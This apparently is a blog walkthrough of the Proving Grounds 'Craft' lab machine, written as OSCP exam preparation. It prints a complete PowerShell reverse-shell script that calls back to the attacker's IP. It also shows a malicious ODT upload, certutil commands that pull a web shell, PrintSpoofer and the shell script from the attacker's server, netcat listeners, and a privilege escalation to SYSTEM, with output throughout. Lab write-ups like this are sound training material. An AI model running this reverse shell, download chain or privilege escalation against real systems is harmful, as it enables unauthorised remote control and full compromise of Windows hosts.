Proving grounds:Craft

4 min readOct 23, 2022

Today we will take a look at Proving grounds: Craft. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

Network scan

└─# nmap -Pn -sCV — open -p- — min-rate 10000 -oN nmap/open 192.168.249.169
Starting Nmap 7.92 ( https://nmap.org ) at 2022–10–23 06:58 EDT
Nmap scan report for 192.168.249.169
Host is up (0.22s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to — defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
|_http-title: Craft

Apache (80)

Reverse

Create the malicious ODT file

HTB: RE

RE was a box I was really excited about, and I was crushed when the final privesc didn't work on initial deployment…

0xdf.gitlab.io

powershell_reverse_shell.ps1

# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html$client = New-Object System.Net.Sockets.TCPClient(“192.168.49.249”,80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “PS “ + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Open a server with Python

└─# python3 -m http.server 8000

Upload the file to the site

└─# nc -nvlp 80
listening on [any] 80 …
connect to [192.168.49.249] from (UNKNOWN) [192.168.249.169] 50049PS C:\Program Files\LibreOffice\program> whoami /privPRIVILEGES INFORMATION
 — — — — — — — — — — — Privilege Name Description State 
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled 
SeCreateGlobalPrivilege Create global objects Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Apache

We can write a file in C:\xampp\htdocs folder. We can use this to get an reverse shell. I will upload the web shell

PS C:\Program Files\LibreOffice\program> icacls C:\xampp\htdocs
C:\xampp\htdocs CRAFT\apache:(OI)(CI)(F)
                CRAFT\apache:(I)(OI)(CI)(F)
                NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                BUILTIN\Administrators:(I)(OI)(CI)(F)
                BUILTIN\Users:(I)(OI)(CI)(RX)
                BUILTIN\Users:(I)(CI)(AD)
                BUILTIN\Users:(I)(CI)(WD)
                CREATOR OWNER:(I)(OI)(CI)(IO)(F)

PS C:\xampp\htdocs\assets> certutil -urlcache -split -f http://192.168.49.249:8000/webshell.php
**** Online ****
 0000 …
 012e
CertUtil: -URLCache command completed successfully

http://192.168.249.169/assets/webshell.php

Here you can get reverse shell if you want.

Administrator (PrintSpoofer64.exe)

PS C:\xampp\htdocs\assets> whoami /privPRIVILEGES INFORMATION
 — — — — — — — — — — — Privilege Name Description State 
============================= ========================================= ========
SeTcbPrivilege Act as part of the operating system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled 
SeImpersonatePrivilege Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege Create global objects Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\xampp\htdocs\assets> systeminfoHost Name: CRAFT
OS Name: Microsoft Windows Server 2019 Standard

Don’t forget this form

SeImpersonatePrivilege + Microsoft Windows Server 2019 Standard = PrintSpoofer64.exe

PrintSpoofer Windows Privilege Escalation tool : Usage and Illustration.

Lets talk about PrintSpoofer tool. This tiny tool is used for Windows Privilege Escalation. If the target server having…

www.jaacostan.com

You can download it here

Releases · itm4n/PrintSpoofer

You can't perform that action at this time. You signed in with another tab or window. You signed out in another tab or…

github.com

PS C:\Windows\tasks> certutil -urlcache -split -f http://192.168.49.249:8000/PrintSpoofer.exe
**** Online ****
 0000 …
 6a00
CertUtil: -URLCache command completed successfully.PS C:\Windows\tasks> certutil -urlcache -split -f http://192.168.49.249:8000/powershell_reverse_shell.ps1
**** Online ****
 0000 …
 0268
CertUtil: -URLCache command completed successfully.PS C:\Windows\tasks> C:\Windows\tasks\PrintSpoofer64.exe -c “cmd /c powershell -c C:/Windows/Tasks/powershell_reverse_shell.ps1”
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening…
[+] CreateProcessAsUser() OK└─# nc -nvlp 80
listening on [any] 80 …
connect to [192.168.49.249] from (UNKNOWN) [192.168.249.169] 50098PS C:\Windows\system32> whoami
nt authority\system

We learned to get reverse shell from odt file. We used PrintSpoofer in Privilage.

And now we are the system

“If you have any questions or comments, please do not hesitate to write. Have a good days”